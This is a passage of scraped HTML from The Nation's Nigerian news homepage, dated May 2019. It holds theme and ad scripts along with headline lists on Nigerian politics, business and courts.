format-standard has-post-thumbnail hentry category-news category-news-update tag-ambode tag-lagos tag-nigeria-news tag-nigerian-newspaper tag-the-nation-newspaper"> <div class="jeg_postblock_content"> <h3 class="jeg_post_title"> <a href="https://thenationonlineng.net/why-we-remove-structures-to-fix-road-by-lasg/">Why we remove structures to fix road, by LASG</a> </h3> </div> </article><article class="jeg_post jeg_pl_xs_4 post-1041194 post type-post status-publish format-standard has-post-thumbnail hentry category-city-beats category-news tag-nigeria-news tag-nigerian-newspapers tag-the-nation-newspaper"> <div class="jeg_postblock_content"> <h3 class="jeg_post_title"> <a href="https://thenationonlineng.net/lagos-assembly-set-to-address-building-collapse-with-laws-regulations/">Lagos Assembly set to address building collapse with laws, regulations</a> </h3> </div> </article> </div> <div class='module-overlay'> <div class='preloader_type preloader_dot'> <div class="module-preloader jeg_preloader dot"> <span></span><span></span><span></span> </div> <div class="module-preloader jeg_preloader circle"> <div class="jnews_preloader_circle_outer"> <div class="jnews_preloader_circle_inner"></div> </div> </div> <div class="module-preloader jeg_preloader square"> <div class="jeg_square"><div class="jeg_square_inner"></div></div> </div> </div> </div> </div> <div class="jeg_block_navigation"> <div class='navigation_overlay'><div class='module-preloader jeg_preloader'><span></span><span></span><span></span></div></div> </div> <script>var jnews_module_915165_3_5cdd84c4d5fea = {"header_icon":"","first_title":"News","second_title":"","url":"","header_type":"heading_6","header_background":"","header_secondary_background":"","header_text_color":"","header_line_color":"","header_accent_color":"","header_filter_category":"","header_filter_author":"","header_filter_tag":"","header_filter_text":"All","post_type":"post","content_type":"all","number_post":"6","post_offset":"0","unique_content":"disable","include_post":"","exclude_post":"","include_category":"3","exclude_category":"","include_author":"","include_tag":"","exclude_tag":"","sort_by":"latest","date_format":"custom","date_format_custom":"","pagination_mode":"disable","pagination_nextprev_showtext":"","pagination_number_post":4,"pagination_scroll_limit":0,"boxed":"","boxed_shadow":"","el_id":"","el_class":"","scheme":"","column_width":"auto","title_color":"","accent_color":"","alt_color":"","excerpt_color":"","css":"","compatible_column_notice":"","paged":1,"column_class":"jeg_col_2o3","class":"jnews_block_24"};</script> </div><div class='jeg_ad jeg_ad_module jnews_module_915165_4_5cdd84c65f771 '><div class='ads-wrapper'><div class=''><script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script><br /> <br /> <ins class="adsbygoogle" style="display: block;" data-ad-client="ca-pub-5089981496810613" data-ad-slot="4727903770" data-ad-format="auto" data-full-width-responsive="true"></ins><br /> <script> (adsbygoogle = window.adsbygoogle || []).push({}); </script></div></div></div></div></div></div></div><div class="row vc_row vc_inner vc_row-fluid"><div class="wpb_column vc_column_container vc_col-sm-8 vc_hidden-sm vc_hidden-xs"><div class="jeg_wrapper "><div class="wpb_wrapper"><div class="jeg_slider_wrapper jnews_module_915165_5_5cdd84c65fd24 "> <div class="jeg_slider_type_1 jeg_slider owl-carousel" data-autoplay="true" data-delay="6000"> <div class="jeg_slide_item"> <a href="https://thenationonlineng.net/breaking-mtn-nigeria-gains-n184b-in-listing-rally/" class="jeg_slide_img"><div class="thumbnail-container size-500 "><img width="600" height="300" src="https://thenationonlineng.net/wp-content/themes/jnews/assets/img/jeg-empty.png" class="attachment-jnews-750x375 size-jnews-750x375 owl-lazy" alt="remittances, MTN, Court" data-src="https://thenationonlineng.net/wp-content/uploads/2018/10/mtn-1.jpg" /></div></a> <div class="jeg_slide_caption"> <div class="jeg_caption_container"> <div class="jeg_post_category"> <a href="https://thenationonlineng.net/category/business/" class="category-business">Business</a> </div> <h2 class="jeg_post_title"> <a href="https://thenationonlineng.net/breaking-mtn-nigeria-gains-n184b-in-listing-rally/">Breaking: MTN Nigeria gains N184b in listing rally</a> </h2> <div class="jeg_post_meta"><span class="jeg_meta_author">by <a href="https://thenationonlineng.net/author/praise/">Praise Olowe</a></span><span class="jeg_meta_date">May 16, 2019</span></div> </div> </div> </div><div class="jeg_slide_item"> <a href="https://thenationonlineng.net/abdulrazaq-didnt-forge-waec-certificate-says-inec/" class="jeg_slide_img"><div class="thumbnail-container size-500 "><img width="750" height="375" src="https://thenationonlineng.net/wp-content/themes/jnews/assets/img/jeg-empty.png" class="attachment-jnews-750x375 size-jnews-750x375 owl-lazy" alt="Abdulrazaq" data-src="https://thenationonlineng.net/wp-content/uploads/2019/01/3f37a687-abdulrahman-abdulrazaq-750x375.jpg" /></div></a> <div class="jeg_slide_caption"> <div class="jeg_caption_container"> <div class="jeg_post_category"> <a href="https://thenationonlineng.net/category/featured/" class="category-featured">Featured</a> </div> <h2 class="jeg_post_title"> <a href="https://thenationonlineng.net/abdulrazaq-didnt-forge-waec-certificate-says-inec/">Abdulrazaq didn’t forge WAEC certificate, says INEC</a> </h2> <div class="jeg_post_meta"><span class="jeg_meta_author">by <a href="https://thenationonlineng.net/author/praise/">Praise Olowe</a></span><span class="jeg_meta_date">May 16, 2019</span></div> </div> </div> </div><div class="jeg_slide_item"> <a href="https://thenationonlineng.net/breaking-appeal-court-upholds-death-sentence-for-ex-nnpc-staff/" class="jeg_slide_img"><div class="thumbnail-container size-500 "><img width="711" height="375" src="https://thenationonlineng.net/wp-content/themes/jnews/assets/img/jeg-empty.png" class="attachment-jnews-750x375 size-jnews-750x375 owl-lazy" alt="Court, UI hijab crisis, Adamawa Court, Banker Oyo Security guard Court Boycott, Man, EFCC" data-src="https://thenationonlineng.net/wp-content/uploads/2018/07/Court-2.jpg" /></div></a> <div class="jeg_slide_caption"> <div class="jeg_caption_container"> <div class="jeg_post_category"> <a href="https://thenationonlineng.net/category/featured/" class="category-featured">Featured</a> </div> <h2 class="jeg_post_title"> <a href="https://thenationonlineng.net/breaking-appeal-court-upholds-death-sentence-for-ex-nnpc-staff/">Breaking: Appeal Court upholds death sentence for ex-NNPC staff</a> </h2> <div class="jeg_post_meta"><span class="jeg_meta_author">by <a href="https://thenationonlineng.net/author/praise/">Praise Olowe</a></span><span class="jeg_meta_date">May 16, 2019</span></div> </div> </div> </div><div class="jeg_slide_item"> <a href="https://thenationonlineng.net/beware-of-loom-ponzi-scheme-sec-warns-nigerians/" class="jeg_slide_img"><div class="thumbnail-container size-500 "><img width="500" height="367" src="https://thenationonlineng.net/wp-content/themes/jnews/assets/img/jeg-empty.png" class="attachment-jnews-750x375 size-jnews-750x375 owl-lazy" alt="Beware of Loom ponzi scheme, SEC warns Nigerians" data-src="https://thenationonlineng.net/wp-content/uploads/2019/05/MINISTER-BREIFING-2.jpg" /></div></a> <div class="jeg_slide_caption"> <div class="jeg_caption_container"> <div class="jeg_post_category"> <a href="https://thenationonlineng.net/category/featured/" class="category-featured">Featured</a> </div> <h2 class="jeg_post_title"> <a href="https://thenationonlineng.net/beware-of-loom-ponzi-scheme-sec-warns-nigerians/">Beware of Loom ponzi scheme, SEC warns Nigerians</a> </h2> <div class="jeg_post_meta"><span class="jeg_meta_author">by <a href="https://thenationonlineng.net/author/praise/">Praise Olowe</a></span><span class="jeg_meta_date">May 16, 2019</span></div> </div> </div> </div><div class="jeg_slide_item"> <a href="https://thenationonlineng.net/ekiti-sacks-over-2-000-workers-appointed-by-fayose/" class="jeg_slide_img"><div class="thumbnail-container size-500 "><img width="653" height="365" src="https://thenationonlineng.net/wp-content/themes/jnews/assets/img/jeg-empty.png" class="attachment-jnews-750x375 size-jnews-750x375 owl-lazy" alt="Ekiti Fayose Presidency orders EFCC to detain Fayose indefinitely, PDP alleges " data-src="https://thenationonlineng.net/wp-content/uploads/2018/09/ayo-fayose.jpg" /></div></a> <div class="jeg_slide_caption"> <div class="jeg_caption_container"> <div class="jeg_post_category"> <a href="https://thenationonlineng.net/category/featured/" class="category-featured">Featured</a> </div> <h2 class="jeg_post_title"> <a href="https://thenationonlineng.net/ekiti-sacks-over-2-000-workers-appointed-by-fayose/">Breaking: Ekiti sacks over 2, 000 workers appointed by Fayose</a> </h2> <div class="jeg_post_meta"><span class="jeg_meta_author">by <a href="https://thenationonlineng.net/author/praise/">Praise Olowe</a></span><span class="jeg_meta_date">May 16, 2019</span></div> </div> </div> </div><div class="jeg_slide_item"> <a href="https://thenationonlineng.net/updated-senate-confirms-emefieles-reappointment-as-cbn-governor/" class="jeg_slide_img"><div class="thumbnail-container size-500 "><img width="500" height="350" src="https://thenationonlineng.net/wp-content/themes/jnews/assets/img/jeg-empty.png" class="attachment-jnews-750x375 size-jnews-750x375 owl-lazy" alt="Emefiele" data-src="https://thenationonlineng.net/wp-content/uploads/2019/01/emefiele.jpg" /></div></a> <div class="jeg_slide_caption"> <div class="jeg_caption_container"> <div class="jeg_post_category"> <a href="https://thenationonlineng.net/category/featured/" class="category-featured">Featured</a> </div> <h2 class="jeg_post_title"> <a href="https://thenationonlineng.net/updated-senate-confirms-emefieles-reappointment-as-cbn-governor/">Updated: Senate confirms Emefiele’s reappointment as CBN Governor</a> </h2> <div class="jeg_post_meta"><span class="jeg_meta_author">by <a href="https://thenationonlineng.net/author/praise/">Praise Olowe</a></span><span class="jeg_meta_date">May 16, 2019</span></div> </div> </div> </div> </div> <div class="jeg_slider_thumbnail_wrapper"> <div class="jeg_slider_thumbnail owl-carousel"> <div class="jeg_slide_thumbnail_item post-1041255 post type-post status-publish format-standard has-post-thumbnail hentry category-business category-featured category-news-update tag-nigeria-news tag-nigerian-newspapers tag-the-nation-newspaper"><a href="https://thenationonlineng.net/breaking-mtn-nigeria-gains-n184b-in-listing-rally/"><div class="thumbnail-container size-715 "><img width="120" height="60" src="https://thenationonlineng.net/wp-content/themes/jnews/assets/img/jeg-empty.png" class="attachment-jnews-120x86 size-jnews-120x86 owl-lazy" alt="remittances, MTN, Court" data-src="https://thenationonlineng.net/wp-content/uploads/2018/10/mtn-1.jpg" /></div></a></div><div class="jeg_slide_thumbnail_item post-1041223 post type-post status-publish format-standard has-post-thumbnail hentry category-featured category-news category-news-update tag-nigeria-news tag-nigeria-newspaper tag-nigerian-newspaper tag-the-nation-newspaper"><a href="https://thenationonlineng.net/abdulrazaq-didnt-forge-waec-certificate-says-inec/"><div class="thumbnail-container size-715 "><img width="120" height="86" src="https://thenationonlineng.net/wp-content/themes/jnews/assets/img/jeg-empty.png" class="attachment-jnews-120x86 size-jnews-120x86 owl-lazy" alt="Abdulrazaq" data-src="https://thenationonlineng.net/wp-content/uploads/2019/01/3f37a687-abdulrahman-abdulrazaq-120x86.jpg" /></div></a></div><div class="jeg_slide_thumbnail_item post-1041203 post type-post status-publish format-standard has-post-thumbnail hentry category-featured category-news-update tag-court tag-nigerian-news tag-nigerian-newspaper tag-the-nation-newspaper"><a href="https://thenationonlineng.net/breaking-appeal-court-upholds-death-sentence-for-ex-nnpc-staff/"><div class="thumbnail-container size-715 "><img width="120" height="63" src="https://thenationonlineng.net/wp-content/themes/jnews/assets/img/jeg-empty.png" class="attachment-jnews-120x86 size-jnews-120x86 owl-lazy" alt="Court, UI hijab crisis, Adamawa Court, Banker Oyo Security guard Court Boycott, Man, EFCC" data-src="https://thenationonlineng.net/wp-content/uploads/2018/07/Court-2.jpg" /></div></a></div><div class="jeg_slide_thumbnail_item post-1041210 post type-post status-publish format-standard has-post-thumbnail hentry category-featured category-news-update tag-loom-ponzi tag-nigeria-news tag-nigerian-newspaper tag-the-nation-newspaper"><a href="https://thenationonlineng.net/beware-of-loom-ponzi-scheme-sec-warns-nigerians/"><div class="thumbnail-container size-715 "><img width="120" height="86" src="https://thenationonlineng.net/wp-content/themes/jnews/assets/img/jeg-empty.png" class="attachment-jnews-120x86 size-jnews-120x86 owl-lazy" alt="Beware of Loom ponzi scheme, SEC warns Nigerians" data-src="https://thenationonlineng.net/wp-content/uploads/2019/05/MINISTER-BREIFING-2-120x86.jpg" /></div></a></div><div class="jeg_slide_thumbnail_item post-1041204 post type-post status-publish format-standard has-post-thumbnail hentry category-featured category-news-update tag-nigeria-news tag-nigerian-newspapers tag-the-nation-newspaper"><a href="https://thenationonlineng.net/ekiti-sacks-over-2-000-workers-appointed-by-fayose/"><div class="thumbnail-container size-715 "><img width="120" height="86" src="https://thenationonlineng.net/wp-content/themes/jnews/assets/img/jeg-empty.png" class="attachment-jnews-120x86 size-jnews-120x86 owl-lazy" alt="Ekiti Fayose Presidency orders EFCC to detain Fayose indefinitely, PDP alleges " data-src="https://thenationonlineng.net/wp-content/uploads/2018/09/ayo-fayose-120x86.jpg" /></div></a></div><div class="jeg_slide_thumbnail_item post-1041182 post type-post status-publish format-standard has-post-thumbnail hentry category-featured category-news-update tag-nigeria-news tag-nigerian-newspapers tag-the-nation-newspaper"><a href="https://thenationonlineng.net/updated-senate-confirms-emefieles-reappointment-as-cbn-governor/"><div class="thumbnail-container size-715 "><img width="120" height="86" src="https://thenationonlineng.net/wp-content/themes/jnews/assets/img/jeg-empty.png" class="attachment-jnews-120x86 size-jnews-120x86 owl-lazy" alt="Emefiele" data-src="https://thenationonlineng.net/wp-content/uploads/2019/01/emefiele-120x86.jpg" /></div></a></div> </div> </div> </div></div></div></div><div class="wpb_column vc_column_container vc_col-sm-4 vc_hidden-sm vc_hidden-xs vc_col-has-fill"><div class="jeg_wrapper vc_custom_1557411585844"><div class="wpb_wrapper"><div class="jeg_postblock_28 jeg_postblock jeg_module_hook jeg_pagination_loadmore jeg_col_1o3 jnews_module_915165_6_5cdd84c6739d2 vc_custom_1551167997535 " data-unique="jnews_module_915165_6_5cdd84c6739d2"> <div class="jeg_block_heading jeg_block_heading_1 jeg_subcat_right"> <h3 class="jeg_block_title"><span>News Update</span></h3> </div> <div class="jeg_block_container"> <div class="jeg_posts "> <div class="jeg_postsmall jeg_load_more_flag"> <article class="jeg_post jeg_pl_xs_4 post-1041276 post type-post status-publish format-standard has-post-thumbnail hentry category-news-update tag-nigeria-news tag-nigerian-newspaper tag-ninth-senate tag-the-nation-newspaper"> <div class="jeg_postblock_content"> <h3 class="jeg_post_title"> <a href="https://thenationonlineng.net/ninth-assembly-lawan-to-unfold-legislative-agenda/">Ninth Assembly: Lawan to unfold legislative agenda</a> </h3> <div class="jeg_post_meta"><div class="jeg_meta_date"><a href="https://thenationonlineng.net/ninth-assembly-lawan-to-unfold-legislative-agenda/"><i class="fa fa-clock-o"></i> 4:34 pm</a></div></div> </div> </article><article class="jeg_post jeg_pl_xs_4 post-1041274 post type-post status-publish format-standard has-post-thumbnail hentry category-news category-news-update"> <div class="jeg_postblock_content"> <h3 class="jeg_post_title"> <a href="https://thenationonlineng.net/fgll-improve-ease-of-doing-business-says-buhari/">FG’ll improve ease of doing business, says Buhari</a> </h3> <div class="jeg_post_meta"><div class="jeg_meta_date"><a href="https://thenationonlineng.net/fgll-improve-ease-of-doing-business-says-buhari/"><i class="fa fa-clock-o"></i> 4:33 pm</a></div></div> </div> </article><article class="jeg_post jeg_pl_xs_4 post-1041265 post type-post status-publish format-standard has-post-thumbnail hentry category-city-beats category-news-update tag-nigeria-news tag-nigerian-newspaper tag-the-nation-newspaper"> <div class="jeg_postblock_content"> <h3 class="jeg_post_title"> <a href="https://thenationonlineng.net/50-yr-old-woman-arrested-for-maid-trafficking/">50-yr-old woman arrested for maid trafficking</a> </h3> <div class="jeg_post_meta"><div class="jeg_meta_date"><a href="https://thenationonlineng.net/50-yr-old-woman-arrested-for-maid-trafficking/"><i class="fa fa-clock-o"></i> 4:26 pm</a></div></div> </div> </article><article class="jeg_post jeg_pl_xs_4 post-1041264 post type-post status-publish format-standard has-post-thumbnail hentry category-news-update category-politics tag-ike-ekweremadu tag-nigeria-news tag-nigerian-newspaper tag-the-nation-newspaper tag-the-nation-nigeria"> <div class="jeg_postblock_content"> <h3 class="jeg_post_title"> <a href="https://thenationonlineng.net/constituents-to-ekweremadu-well-decide-when-you-should-retire-from-senate/">Constituents to Ekweremadu: We’ll decide when you should retire from Senate</a> </h3> <div class="jeg_post_meta"><div class="jeg_meta_date"><a href="https://thenationonlineng.net/constituents-to-ekweremadu-well-decide-when-you-should-retire-from-senate/"><i class="fa fa-clock-o"></i> 4:21 pm</a></div></div> </div> </article><article class="jeg_post jeg_pl_xs_4 post-1041249 post type-post status-publish format-standard has-post-thumbnail hentry category-news category-news-update tag-airstrikes"> <div class="jeg_postblock_content"> <h3 class="jeg_post_title"> <a href="https://thenationonlineng.net/saudi-led-airstrikes-pound-sanaa-yemens-capital/">Saudi-led airstrikes pound Sana’a, Yemen’s capital</a> </h3> <div class="jeg_post_meta"><div class="jeg_meta_date"><a href="https://thenationonlineng.net/saudi-led-airstrikes-pound-sanaa-yemens-capital/"><i class="fa fa-clock-o"></i> 4:18 pm</a></div></div> </div> </article> </div> </div> <div class='module-overlay'> <div class='preloader_type preloader_dot'> <div class="module-preloader jeg_preloader dot"> <span></span><span></span><span></span> </div> <div class="module-preloader jeg_preloader circle"> <div class="jnews_preloader_circle_outer"> <div class="jnews_preloader_circle_inner"></div> </div> </div> <div class="module-preloader jeg_preloader square"> <div class="jeg_square"><div class="jeg_square_inner"></div></div> </div> </div> </div> </div> <div class="jeg_block_navigation"> <div class='navigation_overlay'><div class='module-preloader jeg_preloader'><span></span><span></span><span></span></div></div> <div class="jeg_block_loadmore "> <a href="#" class='' data-load='Load More' data-loading='Loading...'> Load More</a> </div> </div> <script>var jnews_module_915165_6_5cdd84c6739d2 = {"header_icon":"","first_title":"News Update","second_title":"","url":"","header_type":"heading_1","header_background":"","header_secondary_background":"","header_text_color":"","header_line_color":"","header_accent_color":"","header_filter_category":"","header_filter_author":"","header_filter_tag":"","header_filter_text":"All","post_type":"post","content_type":"all","number_post":"5","post_offset":"0","unique_content":"disable","include_post":"","exclude_post":"","include_category":"16","exclude_category":"","include_author":"","include_tag":"","exclude_tag":"","sort_by":"latest","show_date":"yes","date_format":"custom","date_format_custom":"g:i a","pagination_mode":"loadmore","pagination_nextprev_showtext":"","pagination_number_post":"5","pagination_scroll_limit":0,"ads_type":"disable","ads_position":1,"ads_random":"","ads_image":"","ads_image_tablet":"","ads_image_phone":"","ads_image_link":"","ads_image_alt":"","ads_image_new_tab":"","google_publisher_id":"","google_slot_id":"","google_desktop":"auto","google_tab":"auto","google_phone":"auto","content":"","ads_bottom_text":"","boxed":"","boxed_shadow":"","show_border":"","el_id":"","el_class":"","scheme":"","column_width":"auto","title_color":"","accent_color":"","alt_color":"","excerpt_color":"","css":".vc_custom_1551167997535{padding-right: 10px !important;padding-left: 10px !important;background-color: #ffffff !important;}","compatible_column_notice":"","paged":1,"column_class":"jeg_col_1o3","class":"jnews_block_28"};</script> </div></div></div></div></div><div class="row vc_row vc_inner vc_row-fluid"><div class="wpb_column vc_column_container vc_col-sm-12"><div class="jeg_wrapper "><div class="wpb_wrapper"><div class='jeg_ad jeg_ad_module jnews_module_915165_7_5cdd84c7c72fa '><div class='ads-wrapper'><div class=''><script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script><br /> <br /> <ins class="adsbygoogle" style="display: block;" data-ad-client="ca-pub-5089981496810613" data-ad-slot="3919847066" data-ad-format="auto" data-full-width-responsive="true"></ins><br /> <script> (adsbygoogle = window.adsbygoogle || []).push({}); </script></div></div></div></div></div></div></div><div class="row vc_row vc_inner vc_row-fluid"><div class="wpb_column vc_column_container vc_col-sm-12 vc_hidden-sm vc_hidden-xs"><div class="jeg_wrapper "><div class="wpb_wrapper"><div class="jeg_postblock_22 jeg_postblock jeg_module_hook jeg_pagination_nextprev jeg_col_2o3 jnews_module_915165_8_5cdd84c7c7a38 vc_custom_1554706607106 " data-unique="jnews_module_915165_8_5cdd84c7c7a38"> <div class="jeg_block_heading jeg_block_heading_6 jeg_subcat_right"> <h3 class="jeg_block_title"><a href="https://thenationonlineng.net/category/news/"><span>News</span></a></h3> </div> <div class="jeg_block_container"> <div class="jeg_posts_wrap"> <div class="jeg_posts jeg_load_more_flag"> <article class="jeg_post jeg_pl_md_5 post-1041274 post type-post status-publish format-standard has-post-thumbnail hentry category-news category-news-update"> <div class="jeg_thumb"> <a href="https://thenationonlineng.net/fgll-improve-ease-of-doing-business-says-buhari/"><div class="thumbnail-container animate-lazy size-715 "><img width="350" height="250" src="https://thenationonlineng.net/wp-content/themes/jnews/assets/img/jeg-empty.png" class="attachment-jnews-350x250 size-jnews-350x250 lazyload wp-post-image" alt="train and railway services to easy business" data-src="https://thenationonlineng.net/wp-content/uploads/2019/05/Muhammadu-Buhari-350x250.jpg" data-sizes="auto" data-srcset="https://thenationonlineng.net/wp-content/uploads/2019/05/Muhammadu-Buhari-350x250.jpg 350w, https://thenationonlineng.net/wp-content/uploads/2019/05/Muhammadu-Buhari-120x86.jpg 120w, https://thenationonlineng.net/wp-content/uploads/2019/05/Muhammadu-Buhari-750x536.jpg 750w" data-expand="700" /></div></a> <div class="jeg_post_category"> <span><a href="https://thenationonlineng.net/category/news/" class="category-news">News</a></span> </div> </div> <div class="jeg_postblock_content"> <h3 class="jeg_post_title"> <a href="https://thenationonlineng.net/fgll-improve-ease-of-doing-business-says-buhari/">FG’ll improve ease of doing business, says Buhari</a> </h3> <div class="jeg_post_meta"><div class="jeg_meta_date"><a href="https://thenationonlineng.net/fgll-improve-ease-of-doing-business-says-buhari/"><i class="fa fa-clock-o"></i> May 16, 2019</a></div></div> </div> </article><article class="jeg_post jeg_pl_md_5 post-1041249 post type-post status-publish format-standard has-post-thumbnail hentry category-news category-news-update tag-airstrikes"> <div class="jeg_thumb"> <a href="https://thenationonlineng.net/saudi-led-airstrikes-pound-sanaa-yemens-capital/"><div class="thumbnail-container animate-lazy size-715 "><img width="350" height="250" src="https://thenationonlineng.net/wp-content/themes/jnews/assets/img/jeg-empty.png" class="attachment-jnews-350x250 size-jnews-350x250 lazyload wp-post-image" alt="Airstrikes Saudi" data-src="https://thenationonlineng.net/wp-content/uploads/2019/05/rsaf-350x250.jpg" data-sizes="auto" data-srcset="https://thenationonlineng.net/wp-content/uploads/2019/05/rsaf-350x250.jpg 350w, https://thenationonlineng.net/wp-content/uploads/2019/05/rsaf-120x86.jpg 120w, https://thenationonlineng.net/wp-content/uploads/2019/05/rsaf-750x536.jpg 750w" data-expand="700" /></div></a> <div class="jeg_post_category"> <span><a href="https://thenationonlineng.net/category/news/" class="category-news">News</a></span> </div> </div> <div class="jeg_postblock_content"> <h3 class="jeg_post_title"> <a href="https://thenationonlineng.net/saudi-led-airstrikes-pound-sanaa-yemens-capital/">Saudi-led airstrikes pound Sana’a, Yemen’s capital</a> </h3> <div class="jeg_post_meta"><div class="jeg_meta_date"><a href="https://thenationonlineng.net/saudi-led-airstrikes-pound-sanaa-yemens-capital/"><i class="fa fa-clock-o"></i> May 16, 2019</a></div></div> </div> </article><article class="jeg_post jeg_pl_md_5 post-1041236 post type-post status-publish format-standard has-post-thumbnail hentry category-news category-news-update tag-nigerian-news tag-nigerian-newspaper tag-the-nation-newspaper"> <div class="jeg_thumb"> <a href="https://thenationonlineng.net/sack-of-2000-workers-in-ekiti-height-of-wickedness-says-fayose/"><div class="thumbnail-container animate-lazy size-715 "><img width="350" height="250" src="https://thenationonlineng.net/wp-content/themes/jnews/assets/img/jeg-empty.png" class="attachment-jnews-350x250 size-jnews-350x250 lazyload wp-post-image" alt="Ekiti Fayose Presidency orders EFCC to detain Fayose indefinitely, PDP alleges " data-src="https://thenationonlineng.net/wp-content/uploads/2018/09/ayo-fayose-350x250.jpg" data-sizes="auto" data-srcset="https://thenationonlineng.net/wp-content/uploads/2018/09/ayo-fayose-350x250.jpg 350w, https://thenationonlineng.net/wp-content/uploads/2018/09/ayo-fayose-120x86.jpg 120w" data-expand="700" /></div></a> <div class="jeg_post_category"> <span><a href="https://thenationonlineng.net/category/news/" class="category-news">News</a></span> </div> </div> <div class="jeg_postblock_content"> <h3 class="jeg_post_title"> <a href="https://thenationonlineng.net/sack-of-2000-workers-in-ekiti-height-of-wickedness-says-fayose/">Sack of 2,000 workers in Ekiti height of wickedness, says Fayose</a> </h3> <div class="jeg_post_meta"><div class="jeg_meta_date"><a href="https://thenationonlineng.net/sack-of-2000-workers-in-ekiti-height-of-wickedness-says-fayose/"><i class="fa fa-clock-o"></i> May 16, 2019</a></div></div> </div> </article><article class="jeg_post jeg_pl_md_5 post-1041223 post type-post status-publish format-standard has-post-thumbnail hentry category-featured category-news category-news-update tag-nigeria-news tag-nigeria-newspaper tag-nigerian-newspaper tag-the-nation-newspaper"> <div class="jeg_thumb"> <a href="https://thenationonlineng.net/abdulrazaq-didnt-forge-waec-certificate-says-inec/"><div class="thumbnail-container animate-lazy size-715 "><img width="350" height="250" src="https://thenationonlineng.net/wp-content/themes/jnews/assets/img/jeg-empty.png" class="attachment-jnews-350x250 size-jnews-350x250 lazyload wp-post-image" alt="Abdulrazaq" data-src="https://thenationonlineng.net/wp-content/uploads/2019/01/3f37a687-abdulrahman-abdulrazaq-350x250.jpg" data-sizes="auto" data-srcset="https://thenationonlineng.net/wp-content/uploads/2019/01/3f37a687-abdulrahman-abdulrazaq-350x250.jpg 350w, https://thenationonlineng.net/wp-content/uploads/2019/01/3f37a687-abdulrahman-abdulrazaq-800x570.jpg 800w, https://thenationonlineng.net/wp-content/uploads/2019/01/3f37a687-abdulrahman-abdulrazaq-120x86.jpg 120w, https://thenationonlineng.net/wp-content/uploads/2019/01/3f37a687-abdulrahman-abdulrazaq-750x536.jpg 750w" data-expand="700" /></div></a> <div class="jeg_post_category"> <span><a href="https://thenationonlineng.net/category/featured/" class="category-featured">Featured</a></span> </div> </div> <div class="jeg_postblock_content"> <h3 class="jeg_post_title"> <a href="https://thenationonlineng.net/abdulrazaq-didnt-forge-waec-certificate-says-inec/">Abdulrazaq didn’t forge WAEC certificate, says INEC</a> </h3> <div class="jeg_post_meta"><div class="jeg_meta_date"><a href="https://thenationonlineng.net/abdulrazaq-didnt-forge-waec-certificate-says-inec/"><i class="fa fa-clock-o"></i> May 16, 2019</a></div></div> </div> </article><article class="jeg_post jeg_pl_md_5 post-1041209 post type-post status-publish format-standard has-post-thumbnail hentry category-news category-news-update tag-ambode tag-lagos tag-nigeria-news tag-nigerian-newspaper tag-the-nation-newspaper"> <div class="jeg_thumb"> <a href="https://thenationonlineng.net/why-we-remove-structures-to-fix-road-by-lasg/"><div class="thumbnail-container animate-lazy size-715 "><img width="245" height="250" src="https://thenationonlineng.net/wp-content/themes/jnews/assets/img/jeg-empty.png" class="attachment-jnews-350x250 size-jnews-350x250 lazyload wp-post-image" alt="Lagos, Lagosians" data-src="https://thenationonlineng.net/wp-content/uploads/2018/05/Lagos-logo.jpeg" data-sizes="auto" data-srcset="https://thenationonlineng.net/wp-content/uploads/2018/05/Lagos-logo.jpeg 689w, https://thenationonlineng.net/wp-content/uploads/2018/05/Lagos-logo-167x170.jpeg 167w, https://thenationonlineng.net/wp-content/uploads/2018/05/Lagos-logo-600x612.jpeg 600w" data-expand="700" /></div></a> <div class="jeg_post_category"> <span><a href="https://thenationonlineng.net/category/news/" class="category-news">News</a></span> </div> </div> <div class="jeg_postblock_content"> <h3 class="jeg_post_title"> <a href="https://thenationonlineng.net/why-we-remove-structures-to-fix-road-by-lasg/">Why we remove structures to fix road, by LASG</a> </h3> <div class="jeg_post_meta"><div class="jeg_meta_date"><a href="https://thenationonlineng.net/why-we-remove-structures-to-fix-road-by-lasg/"><i class="fa fa-clock-o"></i> May 16, 2019</a></div></div> </div> </article><article class="jeg_post jeg_pl_md_5 post-1041194 post type-post status-publish format-standard has-post-thumbnail hentry category-city-beats category-news tag-nigeria-news tag-nigerian-newspapers tag-the-nation-newspaper"> <div class="jeg_thumb"> <a href="https://thenationonlineng.net/lagos-assembly-set-to-address-building-collapse-with-laws-regulations/"><div class="thumbnail-container animate-lazy size-715 "><img width="350" height="250" src="https://thenationonlineng.net/wp-content/themes/jnews/assets/img/jeg-empty.png" class="attachment-jnews-350x250 size-jnews-350x250 lazyload wp-post-image" alt="Lagos school collapse" data-src="https://thenationonlineng.net/wp-content/uploads/2019/03/7d834f9999a79d59a55c1e95dad2a746-350x250.gif" data-sizes="auto" data-srcset="https://thenationonlineng.net/wp-content/uploads/2019/03/7d834f9999a79d59a55c1e95dad2a746-350x250.gif 350w, https://thenationonlineng.net/wp-content/uploads/2019/03/7d834f9999a79d59a55c1e95dad2a746-120x86.gif 120w" data-expand="700" /></div></a> <div class="jeg_post_category"> <span><a href="https://thenationonlineng.net/category/city-beats/" class="category-city-beats">City Beats</a></span> </div> </div> <div class="jeg_postblock_content"> <h3 class="jeg_post_title"> <a href="https://thenationonlineng.net/lagos-assembly-set-to-address-building-collapse-with-laws-regulations/">Lagos Assembly set to address building collapse with laws, regulations</a> </h3> <div class="jeg_post_meta"><div class="jeg_meta_date"><a href="https://thenationonlineng.net/lagos-assembly-set-to-address-building-collapse-with-laws-regulations/"><i class="fa fa-clock-o"></i> May 16, 2019</a></div></div> </div> </article><article class="jeg_post jeg_pl_md_5 post-1041188 post type-post status-publish format-standard has-post-thumbnail hentry category-news category-news-update tag-nigeria-news tag-nigerian-newspapers tag-the-nation-newspaper"> <div class="jeg_thumb"> <a href="https://thenationonlineng.net/social-media-addicts-susceptible-to-mental-health-challenges/"><div class="thumbnail-container animate-lazy size-715 "><img width="350" height="250" src="https://thenationonlineng.net/wp-content/themes/jnews/assets/img/jeg-empty.png" class="attachment-jnews-350x250 size-jnews-350x250 lazyload wp-post-image" alt="&#8216;Social media addicts susceptible to mental health challenges&#8217;" data-src="https://thenationonlineng.net/wp-content/uploads/2019/05/social-media_0-350x250.jpg" data-sizes="auto" data-srcset="https://thenationonlineng.net/wp-content/uploads/2019/05/social-media_0-350x250.jpg 350w, https://thenationonlineng.net/wp-content/uploads/2019/05/social-media_0-120x86.jpg 120w, https://thenationonlineng.net/wp-content/uploads/2019/05/social-media_0-750x536.jpg 750w" data-expand="700" /></div></a> <div class="jeg_post_category"> <span><a href="https://thenationonlineng.net/category/news/" 